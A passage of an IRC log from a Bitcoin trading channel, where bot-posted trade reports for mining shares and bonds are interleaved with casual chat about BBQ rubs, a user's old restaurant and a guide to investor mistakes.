= 0.326 BTC [+] Jul 31 06:00:51 [BTCTC] [ACTIVEMINING] 575 @ 0.00665 = 3.8238 BTC [+] Jul 31 06:00:59 b/e is what they wanted Jul 31 06:00:59 <[\\\]> you're* Jul 31 06:01:20 optimator indeed. Jul 31 06:01:37 dub lmao Jul 31 06:02:01 ah i love this chan. you're all a bunch of pedalers. Jul 31 06:02:13 <[\\\]> whatever kiddiepornoman Jul 31 06:02:23 <[\\\]> or whatever it was Jul 31 06:03:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.04318 BTC [-] Jul 31 06:04:45 [HAVELOCK] [SDSTM] 64 @ 0.00890888 = 0.5702 BTC [+] Jul 31 06:05:03 Diablo-D3: burbon street dry rub - yummmm Jul 31 06:05:05 [HAVELOCK] [AM100] 1 @ 0.0414 BTC [-] Jul 31 06:06:14 [HAVELOCK] [SDSTM] 1 @ 0.00891 BTC [+] Jul 31 06:07:11 [HAVELOCK] [AM100] 2 @ 0.0414 = 0.0828 BTC [-] Jul 31 06:07:43 Diablo-D3: i get it when ever i'm in kansas city and it is off the hook - seasons steaks, cures bunions, etc,etc, etc Jul 31 06:08:13 optimator: Im leaning towards a kc-style rub Jul 31 06:08:50 [MPEX] [S.MPOE] 11875 @ 0.00080758 = 9.59 BTC [+] Jul 31 06:09:14 whatever you're rubbing on pork it better have fennel seeds in it Jul 31 06:09:17 pankkake parseval_ pizzaman1337 Populus PsychoticBoy Pucilowski Jul 31 06:09:25 [\\\] all that and a bag of cheaps Jul 31 06:10:09 for bbq sauce i'm partial to the carolinas - i like vinegar over the sweet kc bbq sauce. dry? i haven't tried kc stuff Jul 31 06:11:19 Anyone has good example of BTC investor blunders? I need to make a guide of that. Jul 31 06:11:19 o ya. they have competitions and everything Jul 31 06:11:29 top prize usually being one of those mobile homes Jul 31 06:11:51 optimator: fuck you, its a destination: my dinner table Jul 31 06:11:56 got my double wide in a bbq off Jul 31 06:12:11 pull that pork on my table Jul 31 06:12:15 in your case it probably was a bbw off. Jul 31 06:12:33 a bbw pork off??? Jul 31 06:12:37 lmao Jul 31 06:12:39 double wide Jul 31 06:12:50 pork teh bbw for the bbq off porquetition! Jul 31 06:12:57 [BTCTC] [BTC-BOND] 13 @ 0.009998 = 0.13 BTC [+] Jul 31 06:15:48 [BTCTC] [ACTIVEMINING] 25 @ 0.006306 = 0.1577 BTC [-] Jul 31 06:17:29 mircea_popescu: no one expects the spanish porquesition? Jul 31 06:17:44 [BTCTC] [ACTIVEMINING] 25 @ 0.006306 = 0.1577 BTC [-] Jul 31 06:18:18 [BTCTC] [BTC-BOND] 50 @ 0.009999 = 0.5 BTC [+] Jul 31 06:18:22 [BTCTC] [ACTIVEMINING] 255 @ 0.006306 = 1.608 BTC [-] Jul 31 06:18:29 Diablo-D3:so true! i've been porked more times than i care to recall Jul 31 06:18:44 spanish chicks are thin. Jul 31 06:18:48 it'd be the florida porquisition Jul 31 06:19:08 [BTCTC] [ACTIVEMINING] 25 @ 0.006307 = 0.1577 BTC [+] Jul 31 06:19:38 you know its food porn when you can taste it. not almost taste it. Jul 31 06:20:04 bacon + red onion + yellow mustard + honey + garlic + paprika + apple cider vinegar Jul 31 06:20:12 http://honestlydelicious.blogspot.com/2013/06/paleo-carolina-gold-bbq-sauce.html Jul 31 06:20:14 honestly delicious: Paleo Carolina Gold BBQ Sauce Jul 31 06:20:26 missing fenenel seeds tbh Jul 31 06:20:38 fennel ones too Jul 31 06:20:53 I really shouldnt have punched tis laptop Jul 31 06:20:55 dub: I dont see rib rubs with fennel seeds Jul 31 06:20:59 dub: i love fenenel - but i don't feel it in bbq Jul 31 06:21:14 fennel seeds are good in sausages though Jul 31 06:21:16 thats because you are not a food baller like me Jul 31 06:22:12 bullshit, do you even cook? Jul 31 06:22:27 Diablo-D3: i might substitute agave for the honey Jul 31 06:22:51 do I cook.. Jul 31 06:23:10 optimator: honey is paleo. Jul 31 06:23:35 pick it, kick it, lick it? i think agave fits Jul 31 06:25:55 my kitchen came second two years running in the only competition that matters Jul 31 06:26:16 some of the top chefs in the world ate there regularly Jul 31 06:26:51 [BTCTC] [ASICMINER-PT] 3 @ 4.262 = 12.786 BTC [-] Jul 31 06:26:54 [BTCTC] [ASICMINER-PT] 1 @ 4.261 BTC [-] Jul 31 06:26:56 [BTCTC] [ASICMINER-PT] 8 @ 4.256 = 34.048 BTC [-] Jul 31 06:26:59 [BTCTC] [ASICMINER-PT] 1 @ 4.251 BTC [-] Jul 31 06:27:01 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 31 06:27:04 [BTCTC] [ASICMINER-PT] 4 @ 4.25 = 17 BTC [-] Jul 31 06:27:07 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 31 06:27:10 [BTCTC] [ASICMINER-PT] 10 @ 4.25 = 42.5 BTC [-] Jul 31 06:27:38 i do like katy's description of the carolina bbq sauce - but just because she says Gamecocks Jul 31 06:27:54 dub where's that ? Jul 31 06:28:18 wheres what? Jul 31 06:28:52 my kitchen came second two years running in the only competition that matters Jul 31 06:29:05 it was in my restaurant Jul 31 06:29:19 hungry minds want to know Jul 31 06:29:41 what competition, and what restaurant Jul 31 06:30:22 dub yes i imagine. where's that restaurant ? Jul 31 06:30:31 on my island Jul 31 06:30:34 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 31 06:30:58 =| Jul 31 06:30:59 is this you soft-launchuing your ipo ? Jul 31 06:31:08 which is in my ocean Jul 31 06:31:25 on your own planet Jul 31 06:31:28 in your own dreams. Jul 31 06:31:39 [BTCTC] [ASICMINER-PT] 9 @ 4.35 = 39.15 BTC [+] Jul 31 06:31:42 dub u r branson? http://www.neckerisland.virgin.com/ Jul 31 06:31:55 he's bransom ramsey Jul 31 06:32:01 lol Jul 31 06:32:01 dude, if hes branson, I am going to kickban him Jul 31 06:32:15 [BTCTC] [S.MPOE-PT] 6 @ 0.0008326 = 0.005 BTC [-] Jul 31 06:32:30 [HAVELOCK] [AM100] 6 @ 0.0414 = 0.2484 BTC [-] Jul 31 06:33:49 the comp is a readers poll in a magazine, the only one worth noting for such matters Jul 31 06:34:18 and the restaurant is long gone Jul 31 06:34:46 sadness :( tell us more Jul 31 06:35:23 whats to tell, I was top of the game. I quit, the end Jul 31 06:35:29 [BTCTC] [ACTIVEMINING] 25 @ 0.006284 = 0.1571 BTC [-] Jul 31 06:35:36 much like all things worth doing Jul 31 06:36:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.04213 = 0.4213 BTC [-] Jul 31 06:36:53 its a really shitty thing to do for a job Jul 31 06:37:08 the hours seem crazy Jul 31 06:38:31 yeah pay sucks too, I was paying more tax after a few years in IT than I grossed as a chef Jul 31 06:39:12 [BTCTC] [ACTIVEMINING] 29 @ 0.006283 = 0.1822 BTC [-] Jul 31 06:39:14 [BTCTC] [ACTIVEMINING] 34 @ 0.006281 = 0.2136 BTC [-] Jul 31 06:39:17 [BTCTC] [ACTIVEMINING] 830 @ 0.00628 = 5.2124 BTC [-] Jul 31 06:39:33 [BTCTC] [ACTIVEMINING] 25 @ 0.006284 = 0.1571 BTC [+] Jul 31 06:40:10 but now I get to watch chicks slide of their chairs when I cook for them Jul 31 06:40:31 [BTCTC] [ACTIVEMINING] 25 @ 0.00628 = 0.157 BTC [-] Jul 31 06:40:34 [BTCTC] [ACTIVEMINING] 558 @ 0.006279 = 3.5037 BTC [-] Jul 31 06:40:54 [BTCTC] [TAT.MINIGAME] 1 @ 0.000299 BTC [-] Jul 31 06:40:55 [BTCTC] [PAJKA.BOND] 8 @ 0.03164 = 0.2531 BTC [+] Jul 31 06:40:57 [BTCTC] [TAT.MINIGAME] 599 @ 0.0003 = 0.1797 BTC [+] Jul 31 06:44:24 https://bitcointalk.org/index.php?topic=265172.0 Jul 31 06:44:29 [GUIDE] The Big Guide to Common Bitcoin Investing Faux Pas Jul 31 06:44:35 There goes being liked by everyone. Jul 31 06:44:49 [BTCTC] [ACTIVEMINING] 415 @ 0.00628 = 2.6062 BTC [+] Jul 31 06:44:51 [BTCTC] [ACTIVEMINING] 700 @ 0.006275 = 4.3925 BTC [-] Jul 31 06:44:53 [BTCTC] [ACTIVEMINING] 125 @ 0.006251 = 0.7814 BTC [-] Jul 31 06:44:54 [BTCTC] [ACTIVEMINING] 500 @ 0.00625 = 3.125 BTC [-] Jul 31 06:46:12 Namworld: being liked is overrated Jul 31 06:46:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.04312 = 0.2156 BTC [+] Jul 31 06:47:59 [BTCTC] [ACTIVEMINING] 25 @ 0.006299 = 0.1575 BTC [+] Jul 31 06:48:25 Namworld pretty good actually. Jul 31 06:48:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006297 = 0.1574 BTC [-] Jul 31 06:48:54 [BTCTC] [ACTIVEMINING] 50 @ 0.006298 = 0.3149 BTC [+] Jul 31 06:49:34 [BTCTC] [ACTIVEMINING] 25 @ 0.006296 = 0.1574 BTC [-] Jul 31 06:49:35 [BTCTC] [ACTIVEMINING] 8 @ 0.006297 = 0.0504 BTC [+] Jul 31 06:50:06 [BTCTC] [ACTIVEMINING] 4 @ 0.006299 = 0.0252 BTC [+] Jul 31 06:50:39 so more idiots ready to buy 100btc if ipo shares in labcoin that's giving itself a million dollar valuation? Jul 31 06:50:47 bit more since bitcoin price went up today Jul 31 06:51:00 of* Jul 31 06:51:20 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 31 06:53:58 [BTCTC] [ACTIVEMINING] 150 @ 0.006299 = 0.9449 BTC [+] Jul 31 06:54:16 ;;ticker Jul 31 06:54:17 MtGox BTCUSD ticker | Best bid: 105.73211, Best ask: 105.99998, Bid-ask spread: 0.26787, Last trade: 105.99999, 24 hour volume: 28607.52814675, 24 hour low: 100.47124, 24 hour high: 108.00000, 24 hour vwap: 104.18693 Jul 31 06:55:21 Hopefully it makes people try to dissociate themselves from such behaviors. Jul 31 06:55:29 I added another entry Jul 31 06:55:34 [BTCTC] [ACTIVEMINING] 25 @ 0.006212 = 0.1553 BTC [-] Jul 31 06:56:06 [BTCTC] [ACTIVEMINING] 220 @ 0.006211 = 1.3664 BTC [-] Jul 31 06:56:32 [BTCTC] [ACTIVEMINING] 7 @ 0.006211 = 0.0435 BTC [-] Jul 31 06:56:48 [BTCTC] [ACTIVEMINING] 7 @ 0.006211 = 0.0435 BTC [-] Jul 31 06:57:07 [BTCTC] [ACTIVEMINING] 18 @ 0.006211 = 0.1118 BTC [-] Jul 31 06:57:24 [BTCTC] [ACTIVEMINING] 16 @ 0.00621 = 0.0994 BTC [-] Jul 31 06:57:54 [BTCTC] [ACTIVEMINING] 2 @ 0.00621 = 0.0124 BTC [-] Jul 31 06:58:24 [BTCTC] [ACTIVEMINING] 2 @ 0.00621 = 0.0124 BTC [-] Jul 31 06:58:36 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002937 = 0.0294 BTC [+] Jul 31 06:58:47 [BTCTC] [ACTIVEMINING] 7 @ 0.006209 = 0.0435 BTC [-] Jul 31 07:00:30 [BTCTC] [ACTIVEMINING] 43 @ 0.006209 = 0.267 BTC [-] Jul 31 07:00:33 [BTCTC] [ACTIVEMINING] 7 @ 0.006212 = 0.0435 BTC [+] Jul 31 07:02:26 [BTCTC] [S.MPOE-PT] 50 @ 0.00093 = 0.0465 BTC [+] Jul 31 07:03:01 [HAVELOCK] [AM100] 2 @ 0.0417 = 0.0834 BTC [+] Jul 31 07:06:24 [HAVELOCK] [AM100] 1 @ 0.04186997 BTC [+] Jul 31 07:07:00 [BTCTC] [ACTIVEMINING] 50 @ 0.006299 = 0.315 BTC [+] Jul 31 07:08:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.04312 = 0.2156 BTC [+] Jul 31 07:08:40 [BTCTC] [ACTIVEMINING] 200 @ 0.006299 = 1.2598 BTC [+] Jul 31 07:10:28 [BTCTC] [ACTIVEMINING] 50 @ 0.006299 = 0.315 BTC [+] Jul 31 07:11:01 [BTCTC] [ASICMINER-PT] 1 @ 4.261 BTC [-] Jul 31 07:13:26 [BTCTC] [ACTIVEMINING] 3 @ 0.0063 = 0.0189 BTC [+] Jul 31 07:13:28 [BTCTC] [ACTIVEMINING] 72 @ 0.0063 = 0.4536 BTC [+] Jul 31 07:14:19 [BTCTC] [TAT.MINIGAME] 119 @ 0.0003 = 0.0357 BTC [+] Jul 31 07:15:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.04313 = 0.4313 BTC [+] Jul 31 07:16:20 [BTCTC] [ASICMINER-PT] 1 @ 4.348 BTC [+] Jul 31 07:17:24 [BTCTC] [TAT.ASICMINER] 46 @ 0.04319 = 1.9867 BTC [+] Jul 31 07:17:39 [BTCTC] [ACTIVEMINING] 166 @ 0.006298 = 1.0455 BTC [-] Jul 31 07:17:41 [BTCTC] [ACTIVEMINING] 18 @ 0.006299 = 0.1134 BTC [+] Jul 31 07:17:43 [BTCTC] [ACTIVEMINING] 216 @ 0.006299 = 1.3606 BTC [+] Jul 31 07:17:46 [BTCTC] [ACTIVEMINING] 184 @ 0.006299 = 1.159 BTC [+] Jul 31 07:18:54 [BTCTC] [DMS.PURCHASE] 1 @ 0.03162 BTC [-] Jul 31 07:19:48 [BTCTC] [ACTIVEMINING] 70 @ 0.0063 = 0.441 BTC [+] Jul 31 07:20:23 [BTCTC] [ASICMINER-PT] 1 @ 4.348 BTC [+] Jul 31 07:21:22 [BTCTC] [ACTIVEMINING] 714 @ 0.0083 = 5.9262 BTC [+] Jul 31 07:22:05 [BTCTC] [ACTIVEMINING] 8 @ 0.0063 = 0.0504 BTC [-] Jul 31 07:22:17 [BTCTC] [ACTIVEMINING] 492 @ 0.0063 = 3.0996 BTC [-] Jul 31 07:22:21 [BTCTC] [ACTIVEMINING] 8 @ 0.0063 = 0.0504 BTC [-] Jul 31 07:23:16 [BTCTC] [ACTIVEMINING] 1 @ 0.006387 BTC [+] Jul 31 07:23:48 [BTCTC] [ACTIVEMINING] 25 @ 0.006388 = 0.1597 BTC [+] Jul 31 07:23:50 [BTCTC] [ACTIVEMINING] 483 @ 0.0063 = 3.0429 BTC [-] Jul 31 07:24:20 [BTCTC] [ACTIVEMINING] 8 @ 0.006496 = 0.052 BTC [+] Jul 31 07:25:16 [BTCTC] [ACTIVEMINING] 190 @ 0.006497 = 1.2344 BTC [+] Jul 31 07:25:19 [BTCTC] [ACTIVEMINING] 96 @ 0.006498 = 0.6238 BTC [+] Jul 31 07:26:04 [BTCTC] [ACTIVEMINING] 286 @ 0.0083 = 2.3738 BTC [+] Jul 31 07:32:22 [BTCTC] [TAT.MINIGAME] 200 @ 0.000314 = 0.0628 BTC [+] Jul 31 07:34:05 [HAVELOCK] [VTX] 2 @ 0.497 = 0.994 BTC [+] Jul 31 07:34:12 [HAVELOCK] [VTX] 2 @ 0.496 = 0.992 BTC [-] Jul 31 07:34:22 [HAVELOCK] [VTX] 1 @ 0.4955 BTC [-] Jul 31 07:34:34 all this bbq talk deserves some sthrn beats Jul 31 07:34:57 https://soundcloud.com/41beats/southern-sheit-vol-1-2011-by Jul 31 07:35:43 some va beats Jul 31 07:38:47 [BTCTC] [DMS.MINING] 20 @ 0.008406 = 0.1681 BTC [+] Jul 31 07:38:49 [BTCTC] [DMS.MINING] 3 @ 0.008406 = 0.0252 BTC [+] Jul 31 07:38:51 [BTCTC] [DMS.MINING] 180 @ 0.008405 = 1.5129 BTC [-] Jul 31 07:38:53 [BTCTC] [DMS.MINING] 300 @ 0.008403 = 2.5209 BTC [-] Jul 31 07:38:55 [BTCTC] [DMS.MINING] 1 @ 0.008401 BTC [-] Jul 31 07:38:57 [BTCTC] [DMS.MINING] 5 @ 0.008322 = 0.0416 BTC [-] Jul 31 07:38:59 [BTCTC] [DMS.MINING] 27 @ 0.008303 = 0.2242 BTC [-] Jul 31 07:39:00 [BTCTC] [DMS.MINING] 250 @ 0.008302 = 2.0755 BTC [-] Jul 31 07:39:01 [BTCTC] [DMS.MINING] 5 @ 0.008301 = 0.0415 BTC [-] Jul 31 07:39:04 [BTCTC] [DMS.MINING] 949 @ 0.0083 = 7.8767 BTC [-] Jul 31 07:39:15 [BTCTC] [DMS.MINING] 5 @ 0.0083 = 0.0415 BTC [-] Jul 31 07:39:18 [BTCTC] [DMS.MINING] 5 @ 0.00816 = 0.0408 BTC [-] Jul 31 07:39:20 [BTCTC] [DMS.MINING] 4 @ 0.008 = 0.032 BTC [-] Jul 31 07:39:22 [BTCTC] [DMS.MINING] 21 @ 0.008 = 0.168 BTC [-] Jul 31 07:41:24 [BTCTC] [BTC-BOND] 40 @ 0.009999 = 0.4 BTC [+] Jul 31 07:41:46 [BTCTC] [ACTIVEMINING] 1 @ 0.006315 BTC [-] Jul 31 07:42:18 [BTCTC] [ACTIVEMINING] 25 @ 0.006315 = 0.1579 BTC [-] Jul 31 07:42:21 [BTCTC] [ACTIVEMINING] 43 @ 0.006314 = 0.2715 BTC [-] Jul 31 07:42:22 [BTCTC] [ACTIVEMINING] 50 @ 0.006312 = 0.3156 BTC [-] Jul 31 07:42:24 [BTCTC] [ACTIVEMINING] 100 @ 0.00631 = 0.631 BTC [-] Jul 31 07:43:20 [BTCTC] [BASIC-MINING] 2 @ 0.4557 = 0.9114 BTC [+] Jul 31 07:43:22 [BTCTC] [BASIC-MINING] 3 @ 0.4556 = 1.3668 BTC [-] Jul 31 07:43:24 [BTCTC] [BASIC-MINING] 4 @ 0.4426 = 1.7704 BTC [-] Jul 31 07:43:26 [BTCTC] [BASIC-MINING] 40 @ 0.4425 = 17.7 BTC [-] Jul 31 07:43:43 [BTCTC] [ACTIVEMINING] 25 @ 0.006449 = 0.1612 BTC [+] Jul 31 07:43:45 [BTCTC] [ACTIVEMINING] 33 @ 0.00645 = 0.2129 BTC [+] Jul 31 07:45:07 [BTCTC] [ASICMINER-PT] 1 @ 4.339 BTC [-] Jul 31 07:45:09 this is poop Jul 31 07:45:51 wow gox up, what happened guys Jul 31 07:47:22 [BTCTC] [ASICMINER-PT] 2 @ 4.339 = 8.678 BTC [-] Jul 31 07:47:59 [BTCTC] [ACTIVEMINING] 1 @ 0.006304 BTC [-] Jul 31 07:47:59 [BTCTC] [ASICMINER-PT] 1 @ 4.339 BTC [-] Jul 31 07:49:59 [BTCTC] [ASICMINER-PT] 3 @ 4.339 = 13.017 BTC [-] Jul 31 07:51:36 hi all Jul 31 07:52:00 [BTCTC] [BTC-BOND] 1 @ 0.009981 BTC [-] Jul 31 07:52:02 smidge Jul 31 07:52:08 whats up Jul 31 07:52:46 not much, nice morning in germany Jul 31 07:52:50 how bout you Jul 31 07:52:54 [BTCTC] [DMS.MINING] 200 @ 0.008 = 1.6 BTC [-] Jul 31 07:53:23 [BTCTC] [ACTIVEMINING] 25 @ 0.006306 = 0.1577 BTC [+] Jul 31 07:53:25 [BTCTC] [ACTIVEMINING] 50 @ 0.006305 = 0.3153 BTC [-] Jul 31 07:53:27 [BTCTC] [ACTIVEMINING] 46 @ 0.006305 = 0.29 BTC [-] Jul 31 07:53:29 [BTCTC] [ACTIVEMINING] 17 @ 0.0063 = 0.1071 BTC [-] Jul 31 07:53:32 [BTCTC] [PAJKA.BOND] 1 @ 0.03158 BTC [-] Jul 31 07:54:17 [BTCTC] [DMS.MINING] 50 @ 0.008 = 0.4 BTC [-] Jul 31 07:55:14 lovely midnight in chicago Jul 31 07:55:20 lol, mox is taking off Jul 31 07:58:19 [BTCTC] [ACTIVEMINING] 25 @ 0.006405 = 0.1601 BTC [+] Jul 31 07:58:21 [BTCTC] [ACTIVEMINING] 187 @ 0.006406 = 1.1979 BTC [+] Jul 31 07:58:22 [BTCTC] [ACTIVEMINING] 50 @ 0.006408 = 0.3204 BTC [+] Jul 31 07:58:24 [BTCTC] [ACTIVEMINING] 300 @ 0.00641 = 1.923 BTC [+] Jul 31 07:58:42 [BTCTC] [ACTIVEMINING] 500 @ 0.00641 = 3.205 BTC [+] Jul 31 07:58:47 [BTCTC] [ACTIVEMINING] 2938 @ 0.00641 = 18.8326 BTC [+] Jul 31 08:01:49 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.002937 = 0.0734 BTC [+] Jul 31 08:03:33 [BTCTC] [ASICMINER-PT] 1 @ 4.345 BTC [+] Jul 31 08:04:25 [BTCTC] [BASIC-MINING] 1 @ 0.4162 BTC [-] Jul 31 08:04:29 [BTCTC] [BASIC-MINING] 2 @ 0.416 = 0.832 BTC [-] Jul 31 08:04:42 [BTCTC] [BASIC-MINING] 25 @ 0.4152 = 10.38 BTC [-] Jul 31 08:08:58 [BTCTC] [ASICMINER-PT] 2 @ 4.35 = 8.7 BTC [+] Jul 31 08:09:00 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 31 08:09:54 [BTCTC] [ACTIVEMINING] 25 @ 0.006157 = 0.1539 BTC [-] Jul 31 08:09:56 [BTCTC] [ACTIVEMINING] 6 @ 0.006156 = 0.0369 BTC [-] Jul 31 08:09:57 [BTCTC] [ACTIVEMINING] 13 @ 0.006155 = 0.08 BTC [-] Jul 31 08:09:59 [BTCTC] [ACTIVEMINING] 6 @ 0.006153 = 0.0369 BTC [-] Jul 31 08:10:54 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 31 08:17:49 [BTCTC] [TAT.ASICMINER] 8 @ 0.04313 = 0.345 BTC [-] Jul 31 08:18:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.04221 = 0.2111 BTC [-] Jul 31 08:19:26 [BTCTC] [ACTIVEMINING] 3 @ 0.006201 = 0.0186 BTC [+] Jul 31 08:24:55 [BTCTC] [ACTIVEMINING] 87 @ 0.006432 = 0.5596 BTC [+] Jul 31 08:24:57 [BTCTC] [ACTIVEMINING] 50 @ 0.006434 = 0.3217 BTC [+] Jul 31 08:25:00 [BTCTC] [ACTIVEMINING] 100 @ 0.006436 = 0.6436 BTC [+] Jul 31 08:25:02 [BTCTC] [ACTIVEMINING] 109 @ 0.006448 = 0.7028 BTC [+] Jul 31 08:25:04 [BTCTC] [ACTIVEMINING] 157 @ 0.006449 = 1.0125 BTC [+] Jul 31 08:25:07 [BTCTC] [ACTIVEMINING] 500 @ 0.00645 = 3.225 BTC [+] Jul 31 08:25:20 [BTCTC] [ACTIVEMINING] 328 @ 0.006497 = 2.131 BTC [+] Jul 31 08:25:34 [BTCTC] [ACTIVEMINING] 4 @ 0.006498 = 0.026 BTC [+] Jul 31 08:25:39 [BTCTC] [ACTIVEMINING] 150 @ 0.006499 = 0.9749 BTC [+] Jul 31 08:25:41 [BTCTC] [ACTIVEMINING] 661 @ 0.0065 = 4.2965 BTC [+] Jul 31 08:25:44 [BTCTC] [ACTIVEMINING] 354 @ 0.0065 = 2.301 BTC [+] Jul 31 08:27:33 [BTCTC] [ACTIVEMINING] 25 @ 0.006281 = 0.157 BTC [-] Jul 31 08:28:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.04221 = 0.2955 BTC [-] Jul 31 08:28:14 [BTCTC] [ACTIVEMINING] 25 @ 0.006281 = 0.157 BTC [-] Jul 31 08:28:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.04221 = 0.1688 BTC [-] Jul 31 08:28:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.0422 = 0.422 BTC [-] Jul 31 08:28:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0422 BTC [-] Jul 31 08:29:17 [BTCTC] [DMS.MINING] 20 @ 0.008121 = 0.1624 BTC [+] Jul 31 08:29:19 [BTCTC] [DMS.MINING] 28 @ 0.00812 = 0.2274 BTC [-] Jul 31 08:29:58 [BTCTC] [GSDPT] 64 @ 0.0034 = 0.2176 BTC [+] Jul 31 08:31:04 [BTCTC] [DMS.SELLING] 30 @ 0.02121 = 0.6363 BTC [-] Jul 31 08:33:15 [BTCTC] [ASICMINER-PT] 2 @ 4.361 = 8.722 BTC [+] Jul 31 08:33:28 114 is current resistance from june Jul 31 08:33:34 its bouncing back a bit Jul 31 08:33:44 [BTCTC] [ASICMINER-PT] 1 @ 4.362 BTC [+] Jul 31 08:34:35 after that 134 i think Jul 31 08:34:48 from may Jul 31 08:35:33 [BTCTC] [ASICMINER-PT] 1 @ 4.364 BTC [+] Jul 31 08:35:37 [BTCTC] [ACTIVEMINING] 1 @ 0.006401 BTC [+] Jul 31 08:36:49 [BTCTC] [ASICMINER-PT] 1 @ 4.364 BTC [+] Jul 31 08:37:46 [BTCTC] [ACTIVEMINING] 25 @ 0.006411 = 0.1603 BTC [+] Jul 31 08:37:56 [BTCTC] [ACTIVEMINING] 301 @ 0.00641 = 1.9294 BTC [-] Jul 31 08:39:36 [BTCTC] [ACTIVEMINING] 1 @ 0.006497 BTC [+] Jul 31 08:41:54 [BTCTC] [ACTIVEMINING] 50 @ 0.006323 = 0.3162 BTC [-] Jul 31 08:41:55 [BTCTC] [ACTIVEMINING] 750 @ 0.006322 = 4.7415 BTC [-] Jul 31 08:43:04 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Jul 31 08:43:51 [BTCTC] [LTC-ATF.B2] 1 @ 0.010439 BTC [+] Jul 31 08:44:54 [HAVELOCK] [SMG] 20 @ 0.00026978 = 0.0054 BTC [+] Jul 31 08:44:57 [BTCTC] [ACTIVEMINING] 25 @ 0.006323 = 0.1581 BTC [+] Jul 31 08:44:58 [BTCTC] [ACTIVEMINING] 1012 @ 0.006322 = 6.3979 BTC [-] Jul 31 08:45:00 [BTCTC] [ACTIVEMINING] 5 @ 0.006304 = 0.0315 BTC [-] Jul 31 08:45:01 [BTCTC] [ACTIVEMINING] 10 @ 0.006303 = 0.063 BTC [-] Jul 31 08:45:04 [BTCTC] [ACTIVEMINING] 200 @ 0.006211 = 1.2422 BTC [-] Jul 31 08:45:07 [BTCTC] [ACTIVEMINING] 400 @ 0.00621 = 2.484 BTC [-] Jul 31 08:45:15 [HAVELOCK] [SMG] 52 @ 0.00026979 = 0.014 BTC [+] Jul 31 08:45:19 [BTCTC] [ACTIVEMINING] 85 @ 0.006108 = 0.5192 BTC [-] Jul 31 08:45:21 [BTCTC] [ACTIVEMINING] 170 @ 0.006107 = 1.0382 BTC [-] Jul 31 08:45:27 [HAVELOCK] [SMG] 23 @ 0.0002698 = 0.0062 BTC [+] Jul 31 08:45:41 [HAVELOCK] [SMG] 5 @ 0.0002699 = 0.0013 BTC [+] Jul 31 08:45:55 [HAVELOCK] [SMG] 20 @ 0.0002699 = 0.0054 BTC [+] Jul 31 08:46:24 [BTCTC] [ACTIVEMINING] 1653 @ 0.00612 = 10.1164 BTC [+] Jul 31 08:47:52 [BTCTC] [ACTIVEMINING] 50 @ 0.006121 = 0.3061 BTC [+] Jul 31 08:47:54 [BTCTC] [ACTIVEMINING] 3347 @ 0.00612 = 20.4836 BTC [-] Jul 31 08:47:56 [BTCTC] [ACTIVEMINING] 15 @ 0.006051 = 0.0908 BTC [-] Jul 31 08:47:58 [BTCTC] [ACTIVEMINING] 30 @ 0.00605 = 0.1815 BTC [-] Jul 31 08:47:59 [BTCTC] [ACTIVEMINING] 830 @ 0.006006 = 4.985 BTC [-] Jul 31 08:48:01 [BTCTC] [ACTIVEMINING] 415 @ 0.006005 = 2.4921 BTC [-] Jul 31 08:48:03 [BTCTC] [ACTIVEMINING] 1000 @ 0.005903 = 5.903 BTC [-] Jul 31 08:48:05 [BTCTC] [ACTIVEMINING] 3020 @ 0.005902 = 17.824 BTC [-] Jul 31 08:48:07 [BTCTC] [ACTIVEMINING] 1500 @ 0.005901 = 8.8515 BTC [-] Jul 31 08:48:15 [BTCTC] [ACTIVEMINING] 12 @ 0.005901 = 0.0708 BTC [-] Jul 31 08:48:17 [BTCTC] [ACTIVEMINING] 81 @ 0.00613 = 0.4965 BTC [+] Jul 31 08:48:19 [BTCTC] [ACTIVEMINING] 50 @ 0.005502 = 0.2751 BTC [-] Jul 31 08:48:22 [BTCTC] [ACTIVEMINING] 1250 @ 0.005501 = 6.8763 BTC [-] Jul 31 08:48:24 [BTCTC] [ACTIVEMINING] 2000 @ 0.0055 = 11 BTC [-] Jul 31 08:48:26 [BTCTC] [ACTIVEMINING] 907 @ 0.0055 = 4.9885 BTC [-] Jul 31 08:48:27 [BTCTC] [ACTIVEMINING] 3000 @ 0.0053 = 15.9 BTC [-] Jul 31 08:48:28 [BTCTC] [ACTIVEMINING] 50 @ 0.005201 = 0.2601 BTC [-] Jul 31 08:48:30 [BTCTC] [ACTIVEMINING] 1 @ 0.005196 BTC [-] Jul 31 08:48:32 [BTCTC] [ACTIVEMINING] 1 @ 0.00511 BTC [-] Jul 31 08:48:34 [BTCTC] [ACTIVEMINING] 1000 @ 0.005102 = 5.102 BTC [-] Jul 31 08:48:35 [BTCTC] [ACTIVEMINING] 560 @ 0.005101 = 2.8566 BTC [-] Jul 31 08:48:37 [BTCTC] [ACTIVEMINING] 3000 @ 0.0051 = 15.3 BTC [-] Jul 31 08:48:38 [BTCTC] [ACTIVEMINING] 75 @ 0.0051 = 0.3825 BTC [-] Jul 31 08:48:41 [BTCTC] [ACTIVEMINING] 1490 @ 0.00501 = 7.4649 BTC [-] Jul 31 08:49:09 [BTCTC] [TAT.ASICMINER] 7 @ 0.0421 = 0.2947 BTC [-] Jul 31 08:51:22 [BTCTC] [ACTIVEMINING] 20 @ 0.005901 = 0.118 BTC [+] Jul 31 08:51:58 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [-] Jul 31 08:52:01 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 31 08:52:50 [BTCTC] [ASICMINER-PT] 5 @ 4.37 = 21.85 BTC [+] Jul 31 08:52:54 [BTCTC] 